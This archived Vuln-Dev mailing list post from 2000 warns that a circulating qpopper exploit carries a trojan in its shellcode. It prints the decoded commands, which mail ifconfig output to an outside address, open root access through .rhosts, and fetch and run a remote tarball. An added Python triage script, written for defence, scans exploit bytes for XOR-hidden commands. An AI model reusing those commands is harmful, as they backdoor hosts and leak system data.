Vulnerability Development mailing list archives

Re: QPOP2.5* exploit ??


From: phi-vulndev () EXORSUS NET (phi-vulndev () EXORSUS NET)
Date: Mon, 15 May 2000 10:36:03 +1000


     this has been found in the wild, however there seems to be a trojan
in the shellcode.  Popper 2.5* has been thought to be safe.  I would not
recommend running this on your own machine unless you crack the
shellcode and see what it does.

Trivial xor of 2 encoding of part of the shellcode reveals:

/bin/sh -c
/sbin/ifconfig -a | mail -s solwar etcownz () hotmail com >> /dev/null;
echo '+ +' >> ~root/.rhosts;
rcp lp () skinner trdlnk com:/usr/spool/lp/model/solwar.tar solwar.tar;
tar -xvf solwar* >> /dev/null;
cd solwar;
chmod +x solwar.sh;
./solwar.sh >> /dev/null;
cd ..;
rm -rf solwar*;

I have yet to totally decode the asm, and don't think I will bother to go
any further, so it is possible it does more than just this, however it
quite obviously isn't a straight qpopper exploit. Anyone tried against a
qpopper install to see if it executes?

Phi.
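
Added example, not part of the original post or of any code from this thread: a way to triage an untrusted exploit's byte array for single-byte-XOR-hidden commands before running it, as the message above describes doing by hand with key 2. It generalises to all 256 keys; the function names, the indicator list and the sample blob are assumptions constructed for illustration.

```python
import re

# Substrings worth flagging in a decoded payload. This list is an assumption,
# drawn from the commands quoted in the message above.
INDICATORS = (b"/bin/sh", b".rhosts", b"mail -s", b"rcp ", b"rm -rf", b"chmod +x")


def xor_strings(blob, key, min_len=6):
    """XOR every byte of blob with key and return runs of printable ASCII."""
    decoded = bytes(b ^ key for b in blob)
    return re.findall(rb"[\x20-\x7e]{%d,}" % min_len, decoded)


def triage(blob):
    """Try every single-byte key (0 means unencoded) and return a list of
    (key, strings) for keys whose decoded strings contain an indicator."""
    hits = []
    for key in range(256):
        found = [s for s in xor_strings(blob, key)
                 if any(ind in s for ind in INDICATORS)]
        if found:
            hits.append((key, found))
    return hits


def build_sample():
    """Constructed stand-in for a byte array lifted from an exploit source:
    arbitrary filler around one command string XORed with 2."""
    hidden = b"echo '+ +' >> ~root/.rhosts;"
    filler = bytes([0x01, 0x80, 0xFF, 0x10])
    return filler + bytes(b ^ 2 for b in hidden) + b"\x00" + filler


if __name__ == "__main__":
    for key, strings in triage(build_sample()):
        for s in strings:
            print("key=0x%02x: %s" % (key, s.decode()))
```

Any hit means the code does more than spawn a shell on the target and should be read in full before it is compiled or run anywhere.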

